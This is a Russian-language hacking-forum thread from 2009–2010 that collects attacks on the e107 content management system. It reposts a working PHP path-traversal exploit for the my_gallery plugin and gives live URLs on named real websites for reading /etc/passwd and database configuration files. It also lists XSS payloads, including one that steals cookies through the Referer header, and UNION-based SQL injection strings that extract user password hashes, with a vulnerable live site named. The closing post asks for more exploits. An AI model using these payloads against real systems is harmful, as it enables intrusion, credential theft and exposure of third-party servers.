ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.

05.07.2009, 01:29
|
|
Познавший АНТИЧАТ
Регистрация: 29.04.2007
Сообщений: 1,189
Провел на форуме: 5749763
Репутация:
1680
|
|
Очень интересное наблюдение!
В движке е107 имеется возможность показывать аватары с других ресурсов, однако никакой проверки контента не существует, и вставив например ссылку со сплойтом вместо аватары, она сработает как Iframe, и хрен её заметишь =)) (ибо img src= и iframe= работают по одному принципу подгрузки контента)
Решение: Отключить нафиг эту функцию показа аватары с удалённого ресурса =)).
Последний раз редактировалось Nightmarе; 19.07.2009 в 01:29..
|
|
|
e107 Plugin my_gallery 2.4.1 Exploit |

24.07.2009, 02:09
|
|
Moderator - Level 7
Регистрация: 28.04.2007
Сообщений: 547
Провел на форуме: 5516499
Репутация:
3702
|
|
e107 Plugin my_gallery 2.4.1 Exploit
e107 Plugin my_gallery 2.4.1 Exploit
Class: Input Validation Error
Remote: Yes
Vulnerable: e107.org my_gallery 2.4.1
e107.org my_gallery 2.3
e107.org my_gallery 0
Код:
<?php
/*
============================================
[o] e107 Plugin my_gallery 2.4.1 Exploit [o]
============================================
Bug [f]ound by NoGe - noge.code@gmail.com
Exploit [c]oded by Vrs-hCk - d00r@telkom.net
* Plugin my_gallery create photo gallery.
* Powered by Highslide JS script.
* With random gallery menu and navigation menu.
* Has a comment system, ratings and search of images.
Download e107 my_gallery 2.4.1 Plugin
http://code.google.com/p/e107mygalleryplugin/downloads/list
=============
[o] Usage [o]
=============
Web 2 XPL << fill with site who use e107 Plugin my_gallery
File 2 Read << fill with file or directory you want to read
Web 2 XPL : www.contoh.com
File 2 Read : /etc/passwd
Then Go!!!
==============
[o] Greetz [o]
==============
MainHack BrotherHood [ http://news.serverisdown.org ]
Vrs-hCk OoN_BoY Paman bL4Ck_3n91n3 Angela Zhang
H312Y yooogy mousekill }^-^{ loqsa zxvf martfella
skulmatic OLiBekaS ulga Cungkee k1tk4t str0ke
FUCK TERORIS!!
*/
$vuln = '/e107_plugins/my_gallery/image.php?file=';
$trasv = '/../../../../../../../../../../../../../../..';
echo "<form method=POST>
Web 2 XPL : <input type=\"text\" name=\"host\" size=30>
File 2 Read : <input type=\"text\" name=\"file\" size=30>
<input type=submit value=\"Go!!!\" name=\"_xpl\">
<br><br>";
if ($_POST['_xpl']) {
$data .= "GET /{$vuln}{$trasv}{$file} HTTP/1.1\r\n";
$data .= "Host: {$host}\r\n";
$data .= "Connection: close\r\n\r\n";
$html = sendpacket($host,$data);
print '<pre>'.htmlspecialchars($html).'</pre>';
}
echo "</form>";
function sendpacket($host,$data) {
if (!$sock = @fsockopen($host,80)) {
die("[!] Connection refused, try again!\n");
}
fputs($sock,$data);
while (!feof($sock)) { $html .= fgets($sock); }
fclose($sock);
return $html;
}
?>
# milw0rm.com [2009-07-23]
|
|
|

26.08.2009, 15:17
|
|
Reservists Of Antichat - Level 6
Регистрация: 15.03.2009
Сообщений: 560
Провел на форуме: 4358210
Репутация:
2017
|
|
Сообщение от Solide Snake
e107 Plugin my_gallery 2.4.1 Exploit
Class: Input Validation Error
Remote: Yes
Vulnerable: e107.org my_gallery 2.4.1
e107.org my_gallery 2.3
e107.org my_gallery 0
1.image.php?file='; это в файле image постом выше
2. Читалка файлов
Файл dload.php
PHP код:
<?php
$file = $_GET['file'];
$date_txt = date("y-m-d_H-i-s");
$text = "Content-Disposition: attachment; filename=".$_SERVER["SERVER_NAME"]."_e107_my_gallery_".$date_txt.".jpg";
header('Content-type: image/jpeg');
header($text);
readfile($file);
?>
все тоже самое тока в еще одном файле
Пример : __http://www.verrechiaswords.com/e107_plugins/my_gallery/dload.php?file=/etc/passwd
там он вам даст сохранить картинку, сохраняем, открываем в блокноте и видим след строчки
Код:
<br />
<b>Warning</b>: readfile(\') [<a href='function.readfile'>function.readfile</a>]: failed to open stream: No such file or directory in <b>/home/verrechi/public_html/e107_plugins/my_gallery/dload.php</b> on line <b>7</b><br />
*conf DB
http://www.verrechiaswords.com/e107_plugins/my_gallery/dload.php?file=../../e107_config.php
Последний раз редактировалось HAXTA4OK; 26.08.2009 в 16:57..
|
|
|

29.08.2009, 14:56
|
|
Познающий
Регистрация: 29.03.2009
Сообщений: 87
Провел на форуме: 2185909
Репутация:
308
|
|
На самом деле експлоит написан был раньше http://milw0rm.com/exploits/5308
http://www.obqvizapavlikeni.com/e107_plugins/my_gallery/dload.php?file=../../e107_config.php
|
|
|

19.09.2009, 19:54
|
|
Познавший АНТИЧАТ
Регистрация: 29.04.2007
Сообщений: 1,189
Провел на форуме: 5749763
Репутация:
1680
|
|
XSS в модуле YouTube Gallery(ytm_gallery):
Код:
e107_plugins/ytm_gallery/ytm.php?paging=<script>alert()</script>
© Nightmare
|
|
|

08.11.2009, 18:36
|
|
Постоянный
Регистрация: 27.07.2008
Сообщений: 614
Провел на форуме: 4532332
Репутация:
1196
|
|
e107(e107_v0.7.16_standart_RUS)
active XSS in comment's news
Код:
......./path/comment.php?comment.news.[id]
Submit comment
Subject: <script>alert(//)</script>
Comment: <script>alert(//)</script>
куки имеют вид:
1. 1a1dc91c907325c69271ddf0c944bc72
id. md5(pass)
при инстале префикс таблиц не фильтруется
Код:
mysql_query("INSERT INTO {$this->previous_steps['mysql']['prefix']}core VALUES ('SitePrefs_Backup', '{$tmp}')");
|
|
|

08.11.2009, 18:46
|
|
Познавший АНТИЧАТ
Регистрация: 29.04.2007
Сообщений: 1,189
Провел на форуме: 5749763
Репутация:
1680
|
|
активки не во всех сборках, в норм версиях фильтрация стоит.
|
|
|

08.11.2009, 19:12
|
|
Banned
Регистрация: 07.05.2009
Сообщений: 103
Провел на форуме: 3202832
Репутация:
1588
|
|
SQL injection in e107 cms
Version = v0.7 or later
SQL
http://localhost/plugins/userjournals_menu/userjournals.php?blog.[SQL]
1:
Код:
-1 union all select 1,2,null,4,5,6,@@version,8,9,0,11,12,13--
2:
Код:
-1 union all select 1,2,3,4,5,6,user_password,8,9,0,11,12,13 from e107_user--
bug site:
http://www.shanomaac.com/e107_plugins/userjournals_menu/userjournals.php?blog.-1%20union%20all%20select%201,2,null,4,5,6,@@versio n,8,9,0,11,12,13--
|
|
|

09.12.2009, 13:53
|
|
Moderator - Level 7
Регистрация: 28.04.2007
Сообщений: 547
Провел на форуме: 5516499
Репутация:
3702
|
|
Межсайтовый скриптинг e107 ветки 0.x
Код:
Referer: "><script>alert(document.cookie)</script>
(c)
|
|
|

26.04.2010, 02:33
|
|
Новичок
Регистрация: 30.11.2009
Сообщений: 9
Провел на форуме: 70191
Репутация:
0
|
|
Сообщение от Nightmarе
Решение: Отключить нафиг эту функцию показа аватары с удалённого ресурса =)).
Оно не загружает, оно просто показывает изображение  , пробывал но ничего не получилось.
Поскажите какие есть уязвимости на 0.7.11 , очень надо.
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|